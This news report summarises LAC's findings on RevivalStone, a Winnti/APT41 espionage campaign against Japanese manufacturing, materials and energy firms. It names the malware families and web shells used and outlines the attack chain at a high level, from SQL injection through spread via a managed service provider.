The China-linked cyber espionage group known as Winnti has been attributed to a sophisticated new campaign, dubbed RevivalStone, targeting Japanese companies across key industries, including manufacturing, materials, and energy.
The RevivalStone campaign, detailed in a report by Japanese cybersecurity company LAC, began in March 2024 and overlaps with a broader threat cluster identified by multiple cybersecurity firms. Trend Micro tracks the group as Earth Freybug, while Cybereason has labeled it as part of Operation CuckooBees, and Symantec refers to the group as Blackfly. Notably, all these variants are considered subsets of the notorious APT41, a Chinese state-sponsored cyber espionage group that has carried out operations for over a decade.
LAC’s findings provide additional insight into the group’s evolving tactics, techniques, and procedures (TTPs). APT41 is known for its ability to execute highly sophisticated espionage campaigns while also disrupting supply chains. The group is particularly skilled at leveraging stealth, using custom malware and tools designed to bypass security defenses, extract sensitive data, and maintain long-term covert access to victim environments.
Recent attacks, spanning from November 2023 to October 2024, leveraged vulnerabilities in public-facing applications like IBM Lotus Domino to deliver various types of malware, including Deathlotus (a passive CGI backdoor supporting file creation and command execution);
Unapimon (a defense evasion utility); Privatelog (a loader used to deploy the Winnti Remote Access Trojan (RAT), also known as Deploylog, which installs a kernel-level rootkit named WINNKIT); Cunningpigeon (a backdoor using Microsoft Graph API for command and control); Windjammer (a rootkit for intercepting network traffic and creating covert communication channels); Shadowgaze (a passive backdoor reusing IIS web server ports for stealthy communications).
The RevivalStone attack chain began with an SQL injection vulnerability in an enterprise resource planning (ERP) system, which allowed the attackers to drop web shells, such as China Chopper and Behinder (also known as Bingxia and IceScorpion), onto the compromised server. These tools were used for reconnaissance, credential collection, lateral movement, and the delivery of an enhanced version of the Winnti malware.
The attackers further expanded their reach by exploiting a managed service provider (MSP) through a shared account, enabling them to propagate the malware to three additional organizations.
Researchers at LAC also discovered references to TreadStone and StoneV5 in the malware associated with the RevivalStone campaign. TreadStone is thought to be a controller designed to work with the Winnti malware. The group’s latest malware appears to be a version upgrade, possibly Winnti v5.0, incorporating advanced features such as enhanced obfuscation, updated encryption algorithms, and improved evasion techniques to bypass modern security defenses.
